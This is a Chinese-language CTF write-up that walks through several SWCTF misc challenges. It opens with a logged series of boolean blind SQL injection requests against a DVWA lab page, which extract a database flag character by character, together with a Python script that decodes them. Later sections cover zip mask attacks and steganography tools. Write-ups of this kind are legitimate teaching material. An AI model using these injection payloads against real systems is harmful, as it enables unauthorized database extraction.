GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>60 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>62 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>63 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>32 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>56 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>52 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>54 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>53 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>67 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>57 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>52 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>54 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>55 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>117 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>122 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>125 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>123 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>124 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),30,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),30,1))>32 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),30,1))>1 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>64 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>32 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>48 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>56 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>52 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>50 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>49 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>47 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>1 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)

编写 python exp:

import re

# 初始化
flag = ""
index = 1
ascs = [0, 0]

with open("my.txt", "r") as f:
    lines = f.readlines()
for i in range(0, len(lines), 2):
    try:
        # 提取关键 payload 片段
        # lines[i] 表示从文件中读取的文本内容中的第 i 行(从零开始计数)
        payload = re.search(r"\d+,1\)\)>\d+", lines[i]).group()

        # 提取索引值
        _index = int(re.search("\d+", payload).group())
        if _index > index:
            index = _index
            if ascs[0] < ascs[1]:
                if code == 200:
                    flag += chr(ascs[1] + 1)
                else:
                    flag += chr(ascs[1])
            else:
                if code == 200:
                    flag += chr(ascs[0])
                else:
                    flag += chr(ascs[1])
            print(flag)
        # 从第二个元素开始到最后一个元素的子序列。因为匹配到的字符串的第一个字符是大于号 >,而我们只需要提取其中的数字部分。
        asc = int(re.search(">\d+", payload).group()[1:])
        # 将新提取到的 ASCII 码值添加到列表 ascs 的末尾,并移除列表中的第一个元素,以确保 ascs 列表中始终只包含两个元素,这两个元素分别代表最近两次提取到的 ASCII 码值。
        ascs.pop(0)
        ascs.append(asc)
        code = int(re.search("\d\d\d", lines[i + 1]).group())

    # 当捕获到异常时不做任何操作
    except:
        pass

eaec9a31d0f14fdba116c8cd630e4e84.png

拿到 flag:flag{hAcker_sq1map_test0_@67}

5、Bieber&Troye

附件是一个加密的压缩包,提示密码已经在视频中给出

842f1f9452894746865749858131aab7.png

链接是一个视频

783456ee4f96457b92c7a105447ff1f5.png

电脑上会默认跳过视频结尾的几帧,因此这里要使用手机打开,在结尾可以看到如下信息:

ea75942b5f72425aa3d14c32812941af.jpeg

利用已知密码和信息,直接进行掩码攻击

得到密码为:@@@qwq7890

c6a8c00eadff427f8983cee3fb7eb91b.png

使用密码解压压缩包,得到两张图片

19b44a32465d448b9bcffb6a71b61be4.png

使用 Stegsolve 工具分析

戳爷的 blue 最低位存在数据隐写(这张封面就是戳爷的专辑《Blue Neighbourhood》)

934a53186aa9412fafb59eb75f46cb5c.png

扫面二维码得到:

Bisa_bahasa_Indo_gak

这个肯定不是 flag,因为我们另一张图片还没有处理,多半只是一个密码

ac59e6be6910443688a591e3f37ed7ea.jpeg

结合文件,这里让我们猜一下 flag

刚好有一个密码,又是 jpg 图片,使用 outguess 对其分析:

outguess -r bieber.jpg -k Bisa_bahasa_Indo_gak out.txt

7a8e291c1dcf4ecb82c30460b7fdfccc.png

数据提取成功,确实存在隐写

拿到 flag:flag{Forget_me_n0t_tea_aLLah}

6、Unmask The Joker

题目附件为txt文档、jpg图片和zip压缩包

dc4c6b5507ae4834862601e83c31a854.png

hello.txt 似乎只是一个打招呼和提示的普通文档 

尝试零宽隐写提取,并未发现什么

cb972f6e43ef406090d6f38128509e23.png

根据文档要求,我们需要先打开加密的压缩包(joker.zip),才能开启真正的挑战

abf6b82cf50142b986a7f1591d7da901.png

最后一句有一定暗示:By the way, can you see anything on my face?

小丑的脸上应该有什么东西

3650fc365190413682472dde48a4b398.png

经过不断尝试,这里是盲水印

5f50cf769a494979977823c640f1176a.png

得到密码:SNERT*2024*SWCTF

使用密码打开joker.zip

e2a1519a50d844b39feb5a012e96ba5f.png

得到三个新的附件:png图片、txt文档,最难处理的是这个joker,并且文件类型未知

7d5b25e676b345c699f4bed5665c4a3c.png

先看已知文件类型的,比如hint.txt

Ctrl+A全选,可以发现还存在一些不可见的东西

898e933980ea499ca8d848ad0506bc8b.png

结合文字提示:有雪在下是难见的远方

雪?那就是snow隐写咯

密码是什么呢?这里也没有其他提示,那就只能用给的文本内容试试了

snow.exe -p 有雪在下是难见的远方 -C hint.txt

得到另一个密钥 AESkey:joker

ac9a15e661cb41c08a962c21aaebd969.png

再看这个direct.png

分析之后并没有发现藏什么东西

那么它也许只是一个方向指引的普通图片

c838a1b53e22430b8524cbef75c89f5a.png

图片上有什么信息呢?一双眼睛和一段文字,结尾沉默被标红了

那么这里我想暗示给大家的是一个工具:沉默的眼睛,也就是 SilentEye

对于做杂项的那么就算没有暗示也会用到这个工具的

接下来我们说这个joker文件

同样使用010editor打开

文件头看不出什么

5abd8104ada248bf8918264fdaa910b4.png

看到文件尾:8D FF

倒序之后不就是妥妥的jpg文件头 FF D8

4b1bdd74bae54565aff3438c51324f06.png

提取hex值(因为这里没有明确分界,保险起见我们提取所有的)

注意:在010editor里面,Ctrl+C或者Ctrl+V针对的是右边的ASCII码操作,如果你想要操作左边的hex十六进制值这需要多加一个shift,即复制为:Ctrl+shift+C,粘贴到左边hex值同理。

对hex值取倒序,这里使用Python脚本实现(还有很多其他方法也可以)

随便让ChatGPT写一个就行

def reverse_and_format_hex(hex_string):
    # 去除可能存在的空格或其他分隔符
    hex_string = hex_string.replace(" ", "").replace("\n", "")

    # 对整个十六进制字符串进行反转
    reversed_hex_string = hex_string[::-1]

    # 每两位为一组,用空格隔开
    formatted_hex_string = ' '.join([reversed_hex_string[i:i+2] for i in range(0, len(reversed_hex_string), 2)])

    return formatted_hex_string

# 输入您的十六进制数据字符串
hex_data = ''''''

# 获取反转并格式化后的十六进制字符串
reversed_and_formatted_hex_data = reverse_and_format_hex(hex_data)

取倒序之后得到以 FF D8开头的hex值

021b4697254c4af49ebf299188843532.png

新建十六进制文件,导入取倒序后的hex值,注意使用Ctrl+shift+V

d91cbc7678b94b658878130254d109cc.png

由于是jpg头,因此我们另存为jpg文件

打开可以看到joker的头像

aeb5f638261b483ab8715e8ed36f7d83.png

重新使用010editor打开该jpg,你就会看到jpg的高亮

为什么我要强调高亮,因为很多时候这个特性便于我们区分文件类型和hex值的位置

可以看到结尾有藏东西

正常的jpg以 FF D9 结束

现在知道常见文件头和文件尾的重要性了吧

1daa7d5a6c5c479faa4aee3c84643647.png

同样进行提取和保存

这里无法判断文件类型,因此我们不加后缀

59be975a3e8647daa59ba160b975a866.png

使用记事本(文本编辑器)打开

ccefe9c992694a7c8a1b09b0f8471e17.png

是一些奇奇怪怪的表情包

2110a47c3b0641309988d0b444b0f8ff.png

那么这个是什么呢,结合前面得到了一个AES的秘钥

0edf1963f0ea4175a572f45c15181351.png

通过检索相关内容,你就会知道这个其实是emoji的AES加密

使用在线网站解码:https://ruotian.io/2020/02/emoji-aes/

6a7ed514f578402da7d07386c24e976e.png

得到一串字符:floccinaucinihilipipification

似乎还是某个密码

9ba5288607b64993ae15ed3ec47f4de9.png

有图片和密码,结合direct.png的暗示:沉默的眼睛,使用silenteye解密

16a2051d00af46c4b4b21bfef3a2a890.png

找到flag:

flag{My_1ife_is_nothing_but_c0medy}

bf523ed5ccf74ffbbe92c5bc6bacb6f5.png

7、勇师傅的奇思妙想(加固版1)

附件如下

c2d54f7bb41a4411b129ee6daffa9ae8.png

Myon.zip下有三个加密压缩包

306d4b7585d44ff68c6e4401b7247e9e.png

先看 key.jpg

d01af38841a4462cb3b4ca4d5be848ec.png

但是手机无法识别,使用 QR_Research扫描

9320a74fa2f94ad886bc1ee93bec9d83.png

得到 password:123456@Swctf

使用密码解压 Myon.zip

得到三个文件,其中两个压缩包都有密码,因此我们先看 world 文档

daa11f3a43794c22b5e81df8146c22bd.png

打开时出现了告警,说明这不只是一个单纯的 world,可能还藏有其他东西导致打开时出错

点击是即可打开

e6e6f666deaf4e47aede24ec92040878.png

根据描述这应该是打开 bx.zip 的秘钥

66a0f3e649b74df6b55fa7a46094aa79.png

但是文字看不懂,采用图片识别,看看能不能找到类似的东西

可以找到很多

这里要注意对 world 内图片的保存方式,尽量不要直接复制粘贴,这样会很大程度的降低画质质量,导致无法正确识别图像内容,我在 world 里也有作说明提醒。

4a842538287c4b14a103e7c27b9db302.png

8373d66e379040d9ae72080205fe38f1.png

7dd3444cfc16427199fb46f39446546c.png

ff1a64f6ebab44ea9179e93f37520f29.png

搜集信息后你会知道这是一种游戏的文字,叫 希卡文(也对应了world文件名hika)

好心的楼主还给你们提供了解码网站:https://kinglisky.github.io/zelda-words/index.html

ec2444bcc8544d44999682901aeef833.png

解码得到 manchester

a21cb2b097fc4836b7348d086985c4fb.png

使用该密码即可打开 bx.zip 

7a94b609ddc2430ca752aac7e4c3cbb8.png

解压后其中两个压缩包都有密码,流量包不存在密码可以直接打开

查看 hi.txt文件

提示可以从流量包找到 run.zip 的秘钥

622713b6ccab45d9b6b98fc4f5859880.png

这个有点困难

是否还记得我前面说过的这个 world 文档打开时有问题

使用 010editor 打开 world 

可以看到它是一个 PK 头,这是压缩包的标志

(其实world和zip文件头是一样的,实质就是由一些目录构成)

4f5ad186373941868e459d6c5d9cabf6.png

将 world 修改后缀为 zip 打开

其中有四个都是自带的,但是多出了一个未知格式的文件 my

351244ffea714d81ae4c6ef6a3874bd4.png

解压该文件并打开

由于不知道文件格式,我们先使用记事本打开

445cf7803950455bac2ecea106ef52e5.png

有两个敏感信息,svg 标签和 alert 弹窗函数

svg 是一种图像格式的后缀(可缩放矢量图形

我们补上后缀,双击打开

899420c7124744f8bf8d1ea497bb4e4d.png

点击 click me 后出现弹窗

得到 mykey:*0*XSS@666

也就是 my.zip 的密码

3435b0a23c1e4af18077ed491aa6a1b6.png

使用密码解压对应压缩包 my.zip

得到一张图片 hint.png

有一个时钟信号 clk ,数据信号 dat,还有一个未知的信号

36a9ca9c2ab74884ae2461f42502d7b4.png

时钟信号和输入信号都有了,那么最后一个大概率就是输出信号

我们目前还不知道这是一种什么规则或者加密方式

时钟信号为规律的周期方波信号

对于输入输出信号,我们假设高电平为1,低电平为0,从 dat 变到 ?

根据图像我们可以看出:高电平被分成了高和低,低电平被分成了低和高

推导出这幅图描述的规则:1 被加密成了 10,0 被加密成了 01

查询后得知,这是曼彻斯特编码的一种

还记得前面解密的希卡文吗?manchester

进一步验证了我们的推测是正确的

这个确实有点为难大家了,浅当是勇师傅个人的奇思妙想吧。

接下来我们就需要直面流量包了

这个其实是之前一个比赛的附件

 关于这个流量包详细的溯源步骤请参考我前面的博客:

https://myon6.blog.csdn.net/article/details/134086143

通过溯源用户名和内网IP

最终我们得到秘钥为:www-data_172.17.0.2

使用该密码解压 run.zip,得到一个可执行程序 run.exe

看这个图标应该是Python写的

我不是很清楚这里对于学逆向的同学会不会更有优势

我让一个学逆向的朋友大致看了下,说并未泄露什么因此也就没做更改

双击打开提示我们输入点东西

bc1f01373e664340a15cc1798af0c6c7.png

随便输一下,并不能得到什么有用信息

06303a512d7940afbedd7a4ee6177f46.png

此时我们还剩下最后一个附件 in.zip

需要密码,因此我们先用 010 editor 打开看看

出现了报错,那么这个 zip 肯定藏了什么东西或者做了什么改动

e489a57334e64501b5dc1491029dd9b0.png

拉到结尾发现隐藏字符串信息

34313eb08df442ddbdb0f6aae46d6a4f.png

==AMtVmTF5GMtVmO5V2a

大小写字母和数字,看起来像 base64 

但是两个等号却在开头,我们知道 base64 的等号只可能补充在结尾

猜测颠倒了顺序,因此对字符串取倒序

得到 a2V5OmVtMG5FTmVtMA==

base64 解码得到

key:em0nENem0

f679039d4bec4ff0baf33219fa48284d.png

使用秘钥解压 in.zip

得到 secret.png

我本来是想做一个幻影坦克,但是不太会调参数

6913b0109fd3425f8104026e3eabbf3b.png

很容易可以看到中央有一个小丑脸的重影

细致一点看(把图像放大)

这里是有东西的

172583b7eafc4e7d8cee505486d89bfc.png

如果实在还是看不清楚,大致调节一下亮度和对比度

a444a45bd28e46e69997a5313cb32b54.png

现在看起来就很清晰了

内容为:@laughing!

想到压缩包名为 in.zip

那么这个应该就是我们需要输入 exe 程序的内容

输入之后回车

果然弹出一串数据:

0110100101101001EE0110100110100101EE0110100101010110EE0110100101101010EE0110101010011010EE0101101001010110EE0110011010101010EE0110010110011001EE0110101001100110EE0110101001011010EE0110101001100101EE0110011010101010EE0110100110010101EE0101101001010101EE0110101001010101EE0110100101100110EE0110011010101010EE0110100110100110EE0110011010010110EE0110011010101010EE0110100101100101EE0110100101100110EE0110100101010110EE0110011001100101EE0110100110010101EE0110011010101010EE0110100110100110EE0110010101010110EE0110100110011010EE0110100101100110EE0110101001011010EE0110011010101010EE0110100110100110EE0110100110101010EE0110011001011001EE0110100101100110EE0110011010101010EE0110100101011010EE0110010101100110EE0110100110101001EE0110101001100101EE0110101001011010EE0110011010101010EE0110101001100101EE0110100110010101EE0110100101010110EE0110100110101001EE0110100110100110EE0110101010010110EE0110100110100101EE0110100110010110EE0110100101101001EE0110100101100110EE0110101010100110

304674a4f6b64d22a5aeaecb632f1669.png

是01的编码,正好对应前面 hint.png 的曼彻斯特编码

但是其中有EE,这里需要剔除

使用记事本即可实现,将EE替换为空

38608be2f9c947cc902778eca2a98c96.png

得到

011010010110100101101001101001010110100101010110011010010110101001101010100110100101101001010110011001101010101001100101100110010110101001100110011010100101101001101010011001010110011010101010011010011001010101011010010101010110101001010101011010010110011001100110101010100110100110100110011001101001011001100110101010100110100101100101011010010110011001101001010101100110011001100101011010011001010101100110101010100110100110100110011001010101011001101001100110100110100101100110011010100101101001100110101010100110100110100110011010011010101001100110010110010110100101100110011001101010101001101001010110100110010101100110011010011010100101101010011001010110101001011010011001101010101001101010011001010110100110010101011010010101011001101001101010010110100110100110011010101001011001101001101001010110100110010110011010010110100101101001011001100110101010100110

找一个在线网站

注意模式的选择

6555729dab1845609a054c7406aa705a.png

解码得到

011001100110110001100001011001110111101100110001010111110100101001110101011100110111010001011111011010000011000001110000011001010101111101101101010110010101111101100100011001010110000101010100011010000101111101101101010000010110101101100101011100110101111101101101011011110101001001100101010111110110001101000101011011100111010001110011010111110111010001101000011000010110111001101101011110010110110001101001011001100110010101111101

现在所有附件都用完了,那么单纯的01数字组成的编码是什么呢?

并且这里没有分割,因此排除摩斯加密

那么大概率就是二进制了

将二进制转 ASCLL 码

c24337b9c2d0458aa79891df4bf9612a.png

得到 flag{1_Just_h0pe_mY_deaTh_mAkes_moRe_cEnts_thanmylife}

8、勇师傅的奇思妙想(加固版2)

ccbdc9dca5ea4bfeb38fd97ab4eceb68.png

图片存在盲水印,得到关于图片压缩包密码的信息

这种告诉了部分密码的一般采用掩码攻击

01cd57e3ae6d4dd582cea63ae7c2e55c.png

目前没得到压缩包,那么图片里应该存在隐藏文件

342384f4c3c54d1a82de63d5757e516c.png

分离出了两个压缩包

94531fb0b4a34f08a30a36e02f8ab541.png

对包含图片的那个压缩包进行掩码攻击

拿到密码 snert2024

1c096706215c4935bf4071b0753575b6.png

使用密码解压压缩包得到三个图片文件

hint.jpg 存在条形码

bd8f2cd5f80a4eb5a1f4fb2a5ad35abe.png

直接扫

9f70b052618e49fe9b7c24bb79ce1118.png

rabbit key from chessboard

兔子密钥来自棋盘(有一种加密方式叫 rabbit 加密)

half.jpg 是一半的二维码

01fd010b04a0426694ce2d3da94ce792.png

还有一个 touch.gif

可以看到有类似五子棋的东西滑过

f96ab89cde734a73837d4913618b9c80.png

动图我们常规的处理方法就是拆分成帧然后拼接:

83b3c4c77cfd493d9a990e39e5b7c4ba.png

可以写脚本也可以用在线网站 

cb309f07d56a4cfe959bdabb90cca817.png

接下来我们找一个合并图片的网站:

动图是从右往左的,因此这里是水平合并

d99c493e66c74460b35776c723484b76.png

下载合并好后的图片

2687d235620c49bfbf17d8182cdae1cc.png

看起来像五子棋,但是这里其实是盲文,文件名叫 touch,叫你触摸,而不是看,盲文就是靠摸的

浅浅对照一下:

598031a4528d4917b1b423ecfb4c5c08.jpeg

braille(正好就是盲文这个单词)

结合前面 hint 的提示:兔子密钥来自棋盘

那么这个单词 braille 应该就是某个 rabit 密文的秘钥

但是我们目前没有密文(另一个压缩包里倒是有一个secret.txt)

而另一个压缩包是加密的,因此我们前面应该还遗漏了还有东西

继续测试,从 half.jpg里面分离出了一张 png 图片,正好是另一半二维码

ca9694dfae1d4bdba770c7ce2b11720c.png

但是仔细一看,这个定位符颜色都不一样

刚好是相反的,因此我们只需要对其中一张取负色后拼接即可

f2de515efd074651afc5d263d8a0bd1e.png

对右半部分取负色 

0f502b160b004dca9f07cef159518f87.png

拼接

23375bb1e843426795262419cc9690c1.jpeg

扫描

cc2d3543067f4169a27bfb6e169e2509.jpeg

U2FsdGVkX1+rigzBYkaG0L8K9/jNCHhnwmPWbBCvUW0=

猜测就是前面说的 rabbit 加密

解码成功,得到:Quetoutaillebien

b0955a7f7f95458697f05cea7e730afa.png

使用该密码即可打开另一个压缩包

ee70fb5dfbc34a869caf9bcbee254fc0.png

压缩包又是加密的,因此我们先看 txt 文件

根据对应规则可以判断前者是维吉尼亚加密,后者 key 是当铺密码:

f85e3236d75346a6813558dff14382cc.png

0c29575b1e3347a7bdded785db54c13a.jpeg

ebab639e6eb041a191f7b6f72d01cf59.png

先将 key 解出来:

741585369

15853

24862

7415963

对应手机键盘的数字推出对应字母:

MYON

结合密文进行维吉尼亚解密:

64614e6bb58b465f9b7040d1f5b30086.png

得到:thisispassword

使用密码解压压缩包

图片 blue 0 色道存在二维码

5982100d29ac4637841ae4e7df960071.png

解码得到 key:n0thingimp0rtant

59d6f67c10114264b0557ff189919488.png

使用 key 打开 name 的压缩包

3e33de6ff66e4066960ba2a7b3b78145.png

打开 word

b518c19a30904606b91404645db1cdcc.png

说有一份名单,但是我们什么都没看到

选项里面勾上隐藏文字

7c2b25df8db64dc595cb07380ed52dc7.png

有新东西

ab1398880f234e26bd9e4de235b8ba8d.png

调整字体颜色

d81b1a5626cb4a65b8762be1ed649279.png

得到: 

Quincy
Frank
david
lucas
Miles
William
Matthew
wyatt
Tyler
Wesley
Vaughn
flynn
Vance
Daniel
Blake
felix
Uriah
0scar
5tephen
Frederick
Ulric
leo
Quentin
=liot

这里是藏头诗,根据字符特征可以判断为 base64

提取名单首字符,得到密文:

QFdlMWMwTWVfVDBfU05FUlQ=

解码得到:

@We1c0Me_T0_SNERT

0dddf02dc11f447dbe1d344450acb580.png

使用密码解压 flag.zip

4b270478c9ae4c508d23845ae610d806.png

存在隐藏信息:

cNalVNrhNA5JTPJJnJ3x0Lo3TRn-mPJxdPZxNA4t5QpxnR1-hMKBcTE++

56f93c4c33f6469ab9acdc9180fc5ca1.png

XX 解码

1953f03bfc184e9a970a0af9f6a14851.png

拿到 flag:flag{Y0u_mUsT_B_A_w0rm_in_Y0nGs_st0mach}

Myon⁶
关注
专栏目录
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
第三届广东省大学生网络安全攻防大赛新手备赛cry-misc
最新发布
05-28
共同学习一起进步。里面有博主自己刷的misc杂项、密码学题目与解题过程,虽新手但也尽可能做到过程详细讲解了。放在这里有需要的就下载,我也当作第一次参加这个比赛的回忆。
CTF刷题记录11.9WP_几道MISC题复现
weixin_40103894的博客
11-09 980
